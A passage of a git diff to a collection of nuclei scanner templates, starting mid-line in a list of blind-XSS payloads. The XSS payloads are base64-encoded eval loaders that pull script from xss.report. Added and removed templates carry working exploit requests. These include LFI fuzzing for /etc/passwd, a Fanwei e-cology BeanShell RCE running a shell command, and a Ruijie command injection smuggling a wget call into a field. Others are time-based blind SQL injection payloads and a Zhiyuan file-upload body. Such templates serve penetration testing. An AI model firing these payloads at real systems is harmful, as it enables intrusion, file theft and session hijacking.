id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Ii8veHNzLnJlcG9ydC9zL3NoZWxsZWQiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7 onerror=eval(atob(this.id))>' - - 'javascript:eval("var a=document.createElement(\"script\");a.src=\"//xss.report/s/shelled\";document.body.appendChild(a)")' - - '"><input onfocus=eval(atob(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Ii8veHNzLnJlcG9ydC9zL3NoZWxsZWQiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7 autofocus>' - - '"><video><source onerror=eval(atob(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Ii8veHNzLnJlcG9ydC9zL3NoZWxsZWQiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7>' - - '"><iframe srcdoc="<script>var a=parent.document.createElement("script");a.src="https://xss.report/s/shelled";parent.document.body.appendChild(a);</script>">' - - '<script>function b(){eval(this.responseText)};a=new XMLHttpRequest();a.addEventListener("load", b);a.open("GET", "//xss.report/s/shelled");a.send();</script>' - - '<script>$.getScript("//xss.report/s/shelled")</script>' - - 'var a=document.createElement("script");a.src="//xss.report/s/shelled";document.body.appendChild(a);' - - diff --git a/nuclei-templates/Other/0xlfifuzz1.yaml b/nuclei-templates/Other/0xlfifuzz1.yaml new file mode 100644 index 0000000000..a6d73b65f4 --- /dev/null +++ b/nuclei-templates/Other/0xlfifuzz1.yaml @@ -0,0 +1,38 @@ +id: linux-lfi-fuzzing +info: + name: Linux based LFI Fuzzing + author: geeknik,unstabl3,pentest_swissky,sushantkamble,0xSmiley + severity: high + description: Fuzzes for /etc/passwd on passed URLs + tags: linux,lfi,fuzz +requests: + - method: GET + path: + - "{{BaseURL}}/?q=../../../etc/passwd&s=../../../etc/passwd&search=../../../etc/passwd&id=&action=../../../etc/passwd&keyword=../../../etc/passwd&query=../../../etc/passwd&page=../../../etc/passwd&keywords=../../../etc/passwd&url=../../../etc/passwd&view=../../../etc/passwd&cat=../../../etc/passwd&name=../../../etc/passwd&key=../../../etc/passwd&p=../../../etc/passwd" + - "{{BaseURL}}/?q=../../../etc/passwd%00&s=../../../etc/passwd%00&search=../../../etc/passwd%00&id=../../../etc/passwd%00&action=../../../etc/passwd%00&keyword=../../../etc/passwd%00&query=../../../etc/passwd%00&page=../../../etc/passwd%00&keywords=../../../etc/passwd%00&url=../../../etc/passwd%00&view=../../../etc/passwd%00&cat=../../../etc/passwd%00&name=../../../etc/passwd%00&key=../../../etc/passwd%00&p=../../../etc/passwd%00" + - "{{BaseURL}}/?q=%252e%252e%252fetc%252fpasswd&s=%252e%252e%252fetc%252fpasswd&search=%252e%252e%252fetc%252fpasswd&id=%252e%252e%252fetc%252fpasswd&action=%252e%252e%252fetc%252fpasswd&keyword=%252e%252e%252fetc%252fpasswd&query=%252e%252e%252fetc%252fpasswd&page=%252e%252e%252fetc%252fpasswd&keywords=%252e%252e%252fetc%252fpasswd&url=%252e%252e%252fetc%252fpasswd&view=%252e%252e%252fetc%252fpasswd&cat=%252e%252e%252fetc%252fpasswd&name=%252e%252e%252fetc%252fpasswd&key=%252e%252e%252fetc%252fpasswd&p=%252e%252e%252fetc%252fpasswd" + - "{{BaseURL}}/?q=%252e%252e%252fetc%252fpasswd%00&s=%252e%252e%252fetc%252fpasswd%00&search=%252e%252e%252fetc%252fpasswd%00&id=%252e%252e%252fetc%252fpasswd%00&action=%252e%252e%252fetc%252fpasswd%00&keyword=%252e%252e%252fetc%252fpasswd%00&query=%252e%252e%252fetc%252fpasswd%00&page=%252e%252e%252fetc%252fpasswd%00&keywords=%252e%252e%252fetc%252fpasswd%00&url=%252e%252e%252fetc%252fpasswd%00&view=%252e%252e%252fetc%252fpasswd%00&cat=%252e%252e%252fetc%252fpasswd%00&name=%252e%252e%252fetc%252fpasswd%00&key=%252e%252e%252fetc%252fpasswd%00&p=%252e%252e%252fetc%252fpasswd%00" + - "{{BaseURL}}/?q=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd&s=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd&search=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd&id=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd&action=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd&keyword=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd&query=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd&page=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd&keywords=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd&url=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd&view=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd&cat=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd&name=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd&key=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd&p=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd" + - "{{BaseURL}}/?q=....//....//etc/passwd&s=....//....//etc/passwd&search=....//....//etc/passwd&id=....//....//etc/passwd&action=....//....//etc/passwd&keyword=....//....//etc/passwd&query=....//....//etc/passwd&page=....//....//etc/passwd&keywords=....//....//etc/passwd&url=....//....//etc/passwd&view=....//....//etc/passwd&cat=....//....//etc/passwd&name=....//....//etc/passwd&key=....//....//etc/passwd&p=....//....//etc/passwd" + - "{{BaseURL}}/?q=..///////..////..//////etc/passwd&s=..///////..////..//////etc/passwd&search=..///////..////..//////etc/passwd&id=..///////..////..//////etc/passwd&action=..///////..////..//////etc/passwd&keyword=..///////..////..//////etc/passwd&query=..///////..////..//////etc/passwd&page=..///////..////..//////etc/passwd&keywords=..///////..////..//////etc/passwd&url=..///////..////..//////etc/passwd&view=..///////..////..//////etc/passwd&cat=..///////..////..//////etc/passwd&name=..///////..////..//////etc/passwd&key=..///////..////..//////etc/passwd&p=..///////..////..//////etc/passwd" + - "{{BaseURL}}/?q=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&s=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&search=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&id=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&action=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&keyword=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&query=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&page=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&keywords=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&url=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&view=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&cat=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&name=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&key=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&p=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd" + - "{{BaseURL}}/?q=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&s=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&search=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&id=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&action=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&keyword=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&query=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&page=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&keywords=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&url=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&view=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&cat=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&name=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&key=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&p=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd" + - "{{BaseURL}}/?url=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd" + - "{{BaseURL}}/?redirect=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd" + - "{{BaseURL}}/?page=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd" + - "{{BaseURL}}/?q=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd" + - "{{BaseURL}}/image?filename=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd" + - "{{BaseURL}}/image?name=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd" + - "{{BaseURL}}/file?filename=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd" + - "{{BaseURL}}/file?name=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd" + - "{{BaseURL}}/image?filename=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd" + - "{{BaseURL}}/image?name=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd" + - "{{BaseURL}}/file?filename=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd" + - "{{BaseURL}}/file?name=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd" + - "{{BaseURL}}/?q=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd" + stop-at-first-match: true + matchers: + - type: regex + regex: + - "root:.*:0:0:" + part: body diff --git a/nuclei-templates/Other/3cx-management-console-2.yaml b/nuclei-templates/Other/3cx-management-console.yaml similarity index 100% rename from nuclei-templates/Other/3cx-management-console-2.yaml rename to nuclei-templates/Other/3cx-management-console.yaml diff --git a/nuclei-templates/Other/3g-wireless-gateway-3.yaml b/nuclei-templates/Other/3g-wireless-gateway-3.yaml deleted file mode 100644 index e53f7f09f4..0000000000 --- a/nuclei-templates/Other/3g-wireless-gateway-3.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: 3g-wireless-gateway -info: - name: 3G wireless gateway - author: pussycat0x - severity: info - reference: https://www.exploit-db.com/ghdb/7050 - tags: panel,router - -requests: - - method: GET - path: - - "{{BaseURL}}/htmlcode/html/indexdefault.asp" - - matchers-condition: and - matchers: - - type: word - words: - - "g_i3gState" - - "g_sysinfo_sim_state" - - "g_iUID" - condition: and - - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/3g-wireless-gateway-6.yaml b/nuclei-templates/Other/3g-wireless-gateway-6.yaml new file mode 100644 index 0000000000..d8675d9ba9 --- /dev/null +++ b/nuclei-templates/Other/3g-wireless-gateway-6.yaml @@ -0,0 +1,32 @@ +id: 3g-wireless-gateway + +info: + name: 3G Wireless Gateway Detection + author: pussycat0x + severity: info + description: A 3G wireless gateway was detected. + reference: + - https://www.exploit-db.com/ghdb/7050 + classification: + cwe-id: CWE-200 + tags: panel,router + +requests: + - method: GET + path: + - "{{BaseURL}}/htmlcode/html/indexdefault.asp" + + matchers-condition: and + matchers: + - type: word + words: + - "g_i3gState" + - "g_sysinfo_sim_state" + - "g_iUID" + condition: and + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/14 diff --git a/nuclei-templates/CVE-2020/cve-2020-15227.yaml b/nuclei-templates/Other/44 - T9.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-15227.yaml rename to nuclei-templates/Other/44 - T9.yaml diff --git a/nuclei-templates/Other/53kf-fileRead.yaml b/nuclei-templates/Other/53kf-fileread.yaml similarity index 100% rename from nuclei-templates/Other/53kf-fileRead.yaml rename to nuclei-templates/Other/53kf-fileread.yaml diff --git a/nuclei-templates/Other/API-Linkfinder.yaml b/nuclei-templates/Other/API-Linkfinder.yaml new file mode 100644 index 0000000000..bb882c92dd --- /dev/null +++ b/nuclei-templates/Other/API-Linkfinder.yaml @@ -0,0 +1,19 @@ +id: api-linkfinder +info: + name: API Recon + author: nullenc0de + severity: info + tags: file +requests: + - method: GET + path: + - "{{BaseURL}}" + extractors: + - type: regex + name: url_params + regex: + - '[&\?][a-zA-Z0-9\_]+=' + - type: regex + name: relative_links + regex: + - ([a-zA-Z0-9_\-/]{1,}/[a-zA-Z0-9_\-/]{1,}(?:[a-zA-Z]{1,4}|action)(?:[\?|#][^"|']{0,}|)) diff --git a/nuclei-templates/Other/Alibaba-Anyproxy-fileRead.yaml b/nuclei-templates/Other/Alibaba-Anyproxy-fileRead.yaml new file mode 100644 index 0000000000..867c10d7d7 --- /dev/null +++ b/nuclei-templates/Other/Alibaba-Anyproxy-fileRead.yaml @@ -0,0 +1,23 @@ +id: Alibaba-Anyproxy-fileRead +info: + name: Alibaba Anyproxy fetchBody file arbitrary file read + author: str1am + severity: high + reference: + - https://github.com/alibaba/anyproxy/issues/391 + tags: H5AnyproxyS,fileRead +requests: + - method: GET + path: + - "{{BaseURL}}/fetchBody?id=1/../../../../../../../../etc/passwd" + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "root:x" + - "CONNECT" + part: body + condition: and diff --git a/nuclei-templates/Other/aolynkbr304-weakpass.yaml b/nuclei-templates/Other/AolynkBR304-weakPass.yaml similarity index 100% rename from nuclei-templates/Other/aolynkbr304-weakpass.yaml rename to nuclei-templates/Other/AolynkBR304-weakPass.yaml diff --git a/nuclei-templates/Other/Apache-NiFi-rce.yaml b/nuclei-templates/Other/Apache-NiFi-rce.yaml new file mode 100644 index 0000000000..3760ba9222 --- /dev/null +++ b/nuclei-templates/Other/Apache-NiFi-rce.yaml @@ -0,0 +1,23 @@ +id: Apache-NiFi-rce +info: + name: Apache NiFi系统API命令执行 + author: Str1am + severity: high + reference: https://github.com/imjdl/Apache-NiFi-Api-RCE/blob/master/exp.py + tags: NiFi,rce +requests: + - method: GET + path: + - "{{BaseURL}}/nifi-api/access/config" + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "supportsLogin" + - "config" + - "true" + part: body + condition: and diff --git a/nuclei-templates/Other/Biometric-detect.yaml b/nuclei-templates/Other/Biometric-detect.yaml new file mode 100644 index 0000000000..b6f0a2b958 --- /dev/null +++ b/nuclei-templates/Other/Biometric-detect.yaml @@ -0,0 +1,13 @@ +id: biometric-detect +info: + name: Biometric or Fingerprint detect + author: gaurang + severity: info +file: + - extensions: + - all + matchers: + - type: word + words: + - "android.permission.USE_FINGERPRINT" + - "android.permission.USE_BIOMETRIC" diff --git a/nuclei-templates/Other/BlindSQL.yaml b/nuclei-templates/Other/BlindSQL.yaml deleted file mode 100644 index de40926d67..0000000000 --- a/nuclei-templates/Other/BlindSQL.yaml +++ /dev/null @@ -1,35 +0,0 @@ -id: time-based-sqli -info: - name: Time-Based Blind SQL Injection - author: KhukuriRimal - severity: Critical - description: Detects time-based blind SQL injection vulnerability -http: - - method: GET - path: - - "{{BaseURL}}" - headers: - Authorization: "Bearer eyasdsad.asdsad.asdsad" - payloads: - injection: - - "(SELECT(0)FROM(SELECT(SLEEP(7)))a)" - - "'XOR(SELECT(0)FROM(SELECT(SLEEP(7)))a)XOR'Z" - - "' AND (SELECT 4800 FROM (SELECT(SLEEP(7)))HoBG)--" - - "if(now()=sysdate(),SLEEP(7),0)" - - "'XOR(if(now()=sysdate(),SLEEP(7),0))XOR'Z" - - "'XOR(SELECT CASE WHEN(1234=1234) THEN SLEEP(7) ELSE 0 END)XOR'Z" - - "XOR(if(now()=sysdate(),sleep(7),0))XOR" - - "1%20AND%201337%3d(SELECT%201337%20FROM%20PG_SLEEP(7))--%201337" - fuzzing: - - part: query - type: replace - mode: single - fuzz: - - "{{injection}}" - stop-at-first-match: true - matchers: - - type: dsl - dsl: - - "status_code == 200" - - "duration >= 7 && duration <= 16" - condition: and \ No newline at end of file diff --git a/nuclei-templates/Other/CNVD-2018-13393.yaml b/nuclei-templates/Other/CNVD-2018-13393.yaml deleted file mode 100644 index 14115a5565..0000000000 --- a/nuclei-templates/Other/CNVD-2018-13393.yaml +++ /dev/null @@ -1,29 +0,0 @@ -id: CNVD-2018-13393 -info: - name: Metinfo - Local File Inclusion - author: ritikchaddha - severity: high - description: Metinfo is susceptible to local file inclusion. - reference: - - https://paper.seebug.org/676/ - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N - cvss-score: 8.6 - cwe-id: CWE-22 - tags: metinfo,cnvd,cvnd2018,lfi -requests: - - method: GET - path: - - '{{BaseURL}}/include/thumb.php?dir=http\..\admin\login\login_check.php' - redirects: true - max-redirects: 2 - matchers-condition: and - matchers: - - type: word - part: body - words: - - "<?php" - - "login_met_cookie($metinfo_admin_name);" - condition: and - -# Enhanced by mp on 2022/07/05 diff --git a/nuclei-templates/Other/CNVD-2019-32204.yaml b/nuclei-templates/Other/CNVD-2019-32204.yaml new file mode 100644 index 0000000000..3459d11a6c --- /dev/null +++ b/nuclei-templates/Other/CNVD-2019-32204.yaml @@ -0,0 +1,27 @@ +id: CNVD-2019-32204 +info: + name: Fanwei e-cology <=9.0 - Remote Code Execution + author: daffainfo + severity: critical + description: Fanwei e-cology <=9.0 is susceptible to remote code execution vulnerabilities. Remote attackers can directly execute arbitrary commands on the target server by invoking the unauthorized access problem interface in the BeanShell component. Currently, the security patch for this vulnerability has been released. Please take protective measures as soon as possible for users who use the Fanwei e-cology OA system. + reference: + - https://blog.actorsfit.com/a?ID=01500-11a2f7e6-54b0-4a40-9a79-5c56dc6ebd51 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.0 + cwe-id: CWE-77 + tags: fanwei,cnvd,cnvd2019,rce +requests: + - raw: + - | + POST /bsh.servlet.BshServlet HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + bsh.script=exec("cat+/etc/passwd");&bsh.servlet.output=raw + matchers: + - type: regex + regex: + - "root:.*:0:0:" + +# Enhanced by mp on 2022/05/12 diff --git a/nuclei-templates/Other/CNVD-2021-01627.yaml b/nuclei-templates/Other/CNVD-2021-01627.yaml deleted file mode 100644 index 2a6dc252ce..0000000000 --- a/nuclei-templates/Other/CNVD-2021-01627.yaml +++ /dev/null @@ -1,42 +0,0 @@ -id: CNVD-2021-01627 -info: - name: Zhiyuan OA Arbitrary File Upload - author: daffainfo - severity: critical - reference: http://disk.scan.cm/zlsec/zlsec_info/document/wiki/PeiQi_Wiki/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E8%87%B4%E8%BF%9COA/%E8%87%B4%E8%BF%9COA%20ajax.do%20%E7%99%BB%E5%BD%95%E7%BB%95%E8%BF%87%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%20CNVD-2021-01627.md?hash=zE0KEPGJ - tags: zhiyuan,rce,cnvd,cnvd2021 -requests: - - raw: - - | - POST /seeyon/autoinstall.do.css/..;/ajax.do?method=ajaxAction&managerName=formulaManager&requestCompress=gzip HTTP/1.1 - Host: {{Hostname}} - Connection: close - Cache-Control: max-age=0 - Upgrade-Insecure-Requests: 1 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 - Sec-Fetch-Site: none - Sec-Fetch-Mode: navigate - Sec-Fetch-User: ?1 - Sec-Fetch-Dest: document - Accept-Encoding: gzip, deflate - Accept-Language: zh-CN,zh;q=0.9 - loginPageURL=; login_locale=zh_CN; - Content-Type: application/x-www-form-urlencoded - - managerMethod=validate&arguments=%1F%C2%8B%08%00%00%00%00%00%00%0AuTK%C2%93%C2%A2H%10%3E%C3%AF%C3%BE%0A%C3%82%C2%8Bv%C3%B4%C2%8C%C2%8D+c%C2%BB%13%7Bh_%C2%88%28%2A%28%C2%AF%C2%8D%3D%40%15Ba%15%C2%B0%C3%B2%10%C3%AC%C2%98%C3%BF%C2%BE%05%C3%98%C3%93%3D%C2%B1%C2%BDu%C2%A9%C3%8C%C2%AC%C3%8C%C2%AF%C3%B2%C3%BD%C3%97k%C3%B7%14_H%C2%8E%C2%9DC%C2%95x%C3%9D%3F%C2%98%C3%81%17%C3%A6M%C2%A28%C2%A4%C2%96t3%2F%C3%8D%C2%BA%C3%AF%C3%A2y%C2%99%5C%C2%BC4EqT%3Fj%C3%99%05E%3E%C2%938Y%C3%80%C3%BC%C3%89t%C3%BA%C3%BD%C2%A7%C2%AB%C3%A7%3AI%C2%92%3E%C2%A5%C2%9EW%C3%85%C3%91S%C3%A7%C3%BB%C3%AFL%7B%7E%0B%C2%9D%C3%82%C3%A9%C2%A3%C2%B8%C2%BF%C2%A3%26%C2%99qA%C2%99wa%C2%92w%C2%9A%C2%A3%00%C2%91we%3EQ%C3%AB%C3%95%C3%B8%C2%8F%C2%9D%C2%9D%C2%87%C3%B6%C2%A8%1F%C2%A6I%C3%99y%C3%B8%09%C3%8B%C3%9C%5DH%03%0F%C3%A3%C3%9A%C2%87%C2%9D%C2%98%C3%9C%C3%80%2C%C2%A9%5Cn%C3%8CJ%C3%8B+sE%C3%A1%C2%B6%25%C2%B5%C2%8CE%C3%8ERe%C3%81%2C.%C3%96%5C%12%402%C3%8F%01%C2%AF%C3%A7k%C2%A2%14%C2%AE6%C2%96%C2%8F%C2%83%C2%97%C3%A2%28.%22%5B%C2%93%7CH%C3%B4%0Ap%C2%B8pC%16m%C2%B4a%25%C2%85%C3%83g%27R%C2%AE%5B%C2%A2%26%C2%80%C3%A8%21%141gk%C3%82%C3%952+%C2%96D%C2%9C%01q%5C%C3%81%1A%C2%9F%2C8K%13%06%C3%B4%3D%5D%C2%A38mx%C3%93%C3%8F-%7E%25%C2%80%C2%A5Z%7C%2A%C2%A3%C2%B8%C2%B6%C2%B1%C3%89e%24%15%C2%BB%C2%B0%C3%BC%07%C3%B0%2F%C3%9FlQ%0F%5DqQY%C2%A6%C2%9A%C2%B8%C3%9C%C3%B0Q%12%C2%95%C3%942%C2%95%C2%9B%C2%B48%C3%BA%C2%B6%19%C2%B0%C2%B6%21%C2%9CA5%C2%99Q%C2%9D%1B%60%C3%8B%C3%822T%0C%C2%A2L%C2%97%C3%A7%C2%AD%C3%9EA%1C%07%14%C2%A3%C2%92%C3%84M%C3%A2%C3%B1%C3%8A%00PZ%C2%A6%C3%B4%C2%96%1F%5C%C2%A1%C2%B1J%1Dc%C3%A3%C3%AF%C2%B92%00%C3%BC%C3%86%C2%B7%C2%AB%00y%C2%A6%C2%8A%C2%A5E%06-%C2%84G4%3E%16%C2%9A%C2%AB%5CZ%C2%B6vk%C2%A2b%C2%9B%C3%A0%C3%9C%3E%C2%B6%C3%98%C2%B2%28%C2%A5%C2%9Bi%C2%89%C3%96%C2%A4%C3%84.%C2%81%C2%AC3%3D%C2%8FN%26%C3%BBLsZ%C3%A7%C3%BDl%1B%C2%B5%C3%9E%2A%C2%A09%C2%A0%C3%B9%C2%BB%C3%A7-RB%40%C3%B0%15%C2%8A%25%C2%863%C3%A1%00%C2%97%C2%AB%C3%84%25%C3%80wn%2C%C2%B2%0F%C3%BB%C2%81%7D%C3%98T%5B%C3%83%C3%86V%C2%A8%C2%9F%C2%B7%07i%60%21i%048%C3%BD%C3%96%C3%94%00%09Wh%C2%AA%C2%86e%C2%94%03%5B%C3%B3%11%C3%94%C2%A4%C3%94%C2%A9%C3%8E%C2%A3%3D%C2%87%C2%AFN%1B%C3%A3%C3%B8%C2%8D%5E%13%C2%88%C3%A1%1C%C3%93%C2%BA%C2%AA%C2%81K%14%2COW%13U%C3%9F+%C3%B9%C2%90%C2%85k%1A%C2%83c%C3%AE%C3%A3%0D%2As%C3%9B%04%C3%BE%C2%91%C3%93%C3%83%3AV%C2%8D%C3%93%C2%85%23%3F%C3%81V%C3%A5%C3%87%1F%C3%BE%C2%8C%C3%AC_%C3%BFL%C3%A4JB%C2%B2%C3%96%C3%88%C2%A7u%C2%BE%40%C3%A5%27%C3%AB7%7C%C3%AD%3Cr%C2%89%C3%8E%C3%93%C3%BA%C3%84P%0C%12P5zm%7Dj%C2%BD%C3%86%C2%AF_k%23O%C3%8FT%0Eb%C2%AB%12%C3%8E.k%C3%93%7C%2CRY%140%C2%AC%267h%0Cs%C3%97%C3%807%C3%BA6%C3%9D%C3%AB%C3%8AB%09%C3%959%C3%8Dkq%C2%B7%C3%8B%C2%9B%C3%BE%C3%A0T%C2%BC%C2%8Ftb%C3%93%5E%C2%95%C2%97%2B%0CL%1D%03%7E%C2%9F%C3%9B%C2%9C%C3%8E%1E%C2%89%C3%BE%C3%B6G%0Ej%C2%9AN%C2%ADK%C2%8E1%C3%B53%C2%A11%C3%90%C3%B8%C3%A1%C3%8A%C2%8D%14%C3%962%C2%84%C2%90%C3%86G%C3%BD%C3%90Kh%2CRP%05MO%C3%AF%C2%B9q%0EE%7D%08imw%C3%93q%C3%93%C2%93%C2%80S%2A%C3%87%C2%9C%C2%B0%C2%AE%C2%A8%C2%B3%C2%BB%C3%B0Z%C2%B4u%5D%15.%C2%BF%7F%7C%C2%9Fr%26%C3%8D%C2%A3%3EA%29%C3%A8O%5E%C2%B4%C3%B9%C2%B7%C3%A1%C3%8C%031%C2%A4%C2%83%0E%C3%AFw%3B%C3%A3%C2%9F%2B%C3%B5%C3%BE%3B%C3%95%C2%AD%C3%99%C2%9Dim%5B%C2%A6w%07%C3%AC%C2%B7%C3%B7%24%3F%C2%9D%28%40%C2%B3%04%1E%C2%BEt%C2%8E%C2%87%C3%85%C3%97%C3%A7%C2%8FK%C3%A2%C3%A3%C2%9E%C3%A97%0C%C2%8Ez%1F%C3%81%C3%BFO%17%C3%A08%C3%B5%C2%A8c%3F%C2%BE%C3%97%7B%C2%90%12%C3%90%3B1i%C3%A6d%080eY%C3%B6%1E%5E%C2%BB%3F%C3%A8r%C2%A4%0B%C3%B2%C2%B5%C2%BE%C2%B3K%C3%AEu%C3%BF%C3%BE%17%1CR%C2%AD%17W%05%00%00 - matchers-condition: and - matchers: - - type: word - part: body - words: - - '"message":null' - - '"details":null' - - '"code"' - condition: and - - type: word - part: header - words: - - 'application/json' - - type: status - status: - - 500 diff --git a/nuclei-templates/Other/CNVD-2021-09650.yaml b/nuclei-templates/Other/CNVD-2021-09650.yaml deleted file mode 100644 index 96c4ff58fd..0000000000 --- a/nuclei-templates/Other/CNVD-2021-09650.yaml +++ /dev/null @@ -1,24 +0,0 @@ -id: CNVD-2021-09650 - -info: - name: Ruijie EWEB Gateway Platform Command Execution - author: daffainfo - severity: critical - reference: http://j0j0xsec.top/2021/04/22/%E9%94%90%E6%8D%B7EWEB%E7%BD%91%E5%85%B3%E5%B9%B3%E5%8F%B0%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/ - tags: ruijie,cnvd,cnvd2021,rce - -requests: - - raw: - - | - POST /guest_auth/guestIsUp.php - Host: {{Hostname}} - - mac=1&ip=127.0.0.1|wget {{interactsh-url}} - - unsafe: true - matchers: - - type: word - part: interactsh_protocol - name: http - words: - - "http" diff --git a/nuclei-templates/Other/CNVD-2021-14536.yaml b/nuclei-templates/Other/CNVD-2021-14536.yaml new file mode 100644 index 0000000000..dbb561741e --- /dev/null +++ b/nuclei-templates/Other/CNVD-2021-14536.yaml @@ -0,0 +1,40 @@ +id: CNVD-2021-14536 +info: + name: Ruijie RG-UAC Unified Internet Behavior Management Audit System - Information Disclosure + author: daffainfo + severity: high + description: Ruijie RG-UAC Unified Internet Behavior Management Audit System is 